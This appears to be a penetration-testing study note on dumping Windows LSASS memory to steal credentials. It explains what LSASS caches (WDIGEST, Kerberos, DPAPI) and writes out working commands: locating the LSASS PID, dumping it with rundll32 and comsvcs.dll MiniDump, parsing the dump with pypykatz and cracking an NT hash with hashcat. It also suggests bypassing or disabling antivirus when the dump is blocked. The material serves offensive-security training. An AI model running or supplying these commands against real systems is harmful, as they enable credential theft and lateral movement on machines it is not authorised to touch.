
> [Local Security Authority Subsystem Service (LSASS)](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)

- LSASS is a core Windows process responsible for enforcing security policies, handling user authentication, and storing sensitive credential material in memory.

Upon initial logon, LSASS will:

- Cache credentials locally in memory
- Create [access tokens](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens)
- Enforce security policies
- Write to Windows' [security log](https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-security)

- Creating a dump file lets us extract credentials offline using our attack host.

#### Task Manager method

With access to an interactive graphical session on the target, we can use task manager to create a memory dump. This requires us to:

1. Open `Task Manager`
2. Select the `Processes` tab
3. Find and right click the `Local Security Authority Process`
4. Select `Create dump file`
- A file called `lsass.DMP` is created and saved in `%temp%`.
- Transfer this dump file to our attack host using the method mentioned in the previous note and then we can crack it in our attack host.

#### Rundll32.exe & Comsvcs.dll method

- Modern antivirus softwares recognize this method as malicious activity.
- Does not require a GUI session like the Task manager method. can be performed using command line access.
#### Finding LSASS's PID in cmd

```cmd-session
C:\Windows\system32> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Registry                        96 N/A
smss.exe                       344 N/A
csrss.exe                      432 N/A
wininit.exe                    508 N/A
csrss.exe                      520 N/A
winlogon.exe                   580 N/A
services.exe                   652 N/A
lsass.exe                      672 KeyIso, SamSs, VaultSvc
```

#### Finding LSASS's PID in PowerShell
```powershell-session
PS C:\Windows\system32> Get-Process lsass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass
```

#### Creating a dump file using PowerShell

```powershell-session
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
```

- With this command, we are running `rundll32.exe` to call an exported function of `comsvcs.dll` which also calls the MiniDumpWriteDump (`MiniDump`) function to dump the LSASS process memory to a specified directory (`C:\lsass.dmp`). Recall that most modern AV tools recognize this as malicious activity and prevent the command from executing. In these cases, we will need to consider ways to bypass or disable the AV tool we are facing.
## Using Pypykatz to extract credentials

Once we have the dump file on our attack host, we can use a powerful tool called [pypykatz](https://github.com/skelsec/pypykatz) to extract credentials from the `.dmp` file.

#### Running Pypykatz
```shell-session
pypykatz lsa minidump /home/peter/Documents/lsass.dmp 
```


#### WDIGEST

- Found mostly in older windows machines. 
- LSASS caches credentials used by WDIGEST in clear-text.
#### Kerberos
- [Kerberos](https://web.mit.edu/kerberos/#what_is) is a network authentication protocol used by Active Directory in Windows Domain environments. Domain user accounts are granted tickets upon authentication with Active Directory. This ticket is used to allow the user to access shared resources on the network that they have been granted access to without needing to type their credentials each time. LSASS caches `passwords`, `ekeys`, `tickets`, and `pins` associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain.
#### DPAPI

- Mimikatz and Pypykatz can extract the DPAPI `masterkey` for logged-on users whose data is present in LSASS process memory. These masterkeys can then be used to decrypt the secrets associated with each of the applications using DPAPI and result in the capturing of credentials for various accounts.

#### Cracking the NT Hash with Hashcat

```shell-session
sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
```

